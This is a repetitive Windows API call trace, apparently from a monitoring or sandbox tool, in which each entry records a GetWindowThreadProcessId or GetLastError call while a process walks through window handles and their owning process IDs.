	[0107.643] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x874
	[0107.643] GetLastError () returned 0x0
	[0107.645] GetWindow (hWnd=0x4015e, uCmd=0x4) returned 0x0
	[0107.647] IsWindowVisible (hWnd=0x4015e) returned 0
	[0107.647] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9a8
	[0107.647] GetLastError () returned 0x0
	[0107.647] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xb40
	[0107.647] GetLastError () returned 0x0
	[0107.647] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xa00
	[0107.647] GetLastError () returned 0x0
	[0107.647] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.647] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.648] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.648] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.648] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.648] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.648] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.648] GetLastError () returned 0x0
	[0107.648] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.649] GetLastError () returned 0x0
	[0107.649] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9f0
	[0107.649] GetLastError () returned 0x0
	[0107.649] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9e0
	[0107.649] GetLastError () returned 0x0
	[0107.649] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9d0
	[0107.649] GetLastError () returned 0x0
	[0107.649] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9c0
	[0107.649] GetLastError () returned 0x0
	[0107.649] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9b0
	[0107.649] GetLastError () returned 0x0
	[0107.649] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9a0
	[0107.650] GetLastError () returned 0x0
	[0107.650] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x990
	[0107.650] GetLastError () returned 0x0
	[0107.650] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x980
	[0107.650] GetLastError () returned 0x0
	[0107.650] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x970
	[0107.650] GetLastError () returned 0x0
	[0107.650] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x960
	[0107.650] GetLastError () returned 0x0
	[0107.650] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x950
	[0107.650] GetLastError () returned 0x0
	[0107.650] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x940
	[0107.651] GetLastError () returned 0x0
	[0107.651] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x930
	[0107.651] GetLastError () returned 0x0
	[0107.651] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x920
	[0107.651] GetLastError () returned 0x0
	[0107.651] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x910
	[0107.651] GetLastError () returned 0x0
	[0107.651] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x900
	[0107.651] GetLastError () returned 0x0
	[0107.651] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8f0
	[0107.651] GetLastError () returned 0x0
	[0107.652] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8e0
	[0107.652] GetLastError () returned 0x0
	[0107.652] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8d0
	[0107.652] GetLastError () returned 0x0
	[0107.652] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8c0
	[0107.652] GetLastError () returned 0x0
	[0107.652] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8b0
	[0107.652] GetLastError () returned 0x0
	[0107.652] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8a0
	[0107.652] GetLastError () returned 0x0
	[0107.652] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x890
	[0107.652] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x880
	[0107.653] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x870
	[0107.653] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x860
	[0107.653] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x850
	[0107.653] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x840
	[0107.653] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x830
	[0107.653] GetLastError () returned 0x0
	[0107.653] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x820
	[0107.654] GetLastError () returned 0x0
	[0107.654] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x810
	[0107.654] GetLastError () returned 0x0
	[0107.654] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x20c
	[0107.654] GetLastError () returned 0x0
	[0107.654] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7c4
	[0107.654] GetLastError () returned 0x0
	[0107.654] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xc0
	[0107.654] GetLastError () returned 0x0
	[0107.654] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x688
	[0107.654] GetLastError () returned 0x0
	[0107.654] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x6c0
	[0107.654] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x408
	[0107.655] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7d4
	[0107.655] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x544
	[0107.655] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x540
	[0107.655] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x71c
	[0107.655] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x31c
	[0107.655] GetLastError () returned 0x0
	[0107.655] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7ec
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x5b8
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x754
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x664
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x640
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x700
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x410
	[0107.656] GetLastError () returned 0x0
	[0107.656] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7a0
	[0107.656] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x3b4
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x5cc
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x5d4
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7c0
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x364
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x240
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x560
	[0107.657] GetLastError () returned 0x0
	[0107.657] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x57c
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7b0
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x6a4
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x32c
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x670
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4f0
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x514
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x50c
	[0107.658] GetLastError () returned 0x0
	[0107.658] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x514
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x50c
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x514
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4f0
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4f0
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x58c
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x578
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.659] GetLastError () returned 0x0
	[0107.659] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x530
	[0107.659] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x508
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4f4
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x794
	[0107.660] GetLastError () returned 0x0
	[0107.660] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.660] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x448
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x778
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x538
	[0107.661] GetLastError () returned 0x0
	[0107.661] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.661] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x938
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7c8
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xbdc
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xbe0
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9f4
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x964
	[0107.662] GetLastError () returned 0x0
	[0107.662] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9e8
	[0107.662] GetLastError () returned 0x0
	[0107.663] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9e8
	[0107.663] GetLastError () returned 0x0
	[0107.663] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xb40
	[0107.663] GetLastError () returned 0x0
	[0107.663] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xa00
	[0107.663] GetLastError () returned 0x0
	[0107.663] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9f0
	[0107.663] GetLastError () returned 0x0
	[0107.663] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9e0
	[0107.663] GetLastError () returned 0x0
	[0107.663] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9d0
	[0107.663] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9c0
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9b0
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x9a0
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x990
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x980
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x970
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x960
	[0107.664] GetLastError () returned 0x0
	[0107.664] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x950
	[0107.664] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x940
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x930
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x920
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x910
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x900
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8f0
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8e0
	[0107.665] GetLastError () returned 0x0
	[0107.665] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8d0
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8c0
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8b0
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8a0
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x890
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x880
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x870
	[0107.666] GetLastError () returned 0x0
	[0107.666] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x860
	[0107.666] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x850
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x840
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x830
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x820
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x810
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x20c
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7c4
	[0107.667] GetLastError () returned 0x0
	[0107.667] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xc0
	[0107.667] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x688
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x6c0
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x408
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7d4
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x544
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x540
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x71c
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x31c
	[0107.668] GetLastError () returned 0x0
	[0107.668] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7ec
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x5b8
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x754
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x664
	[0107.669] GetLastError () returned 0x0
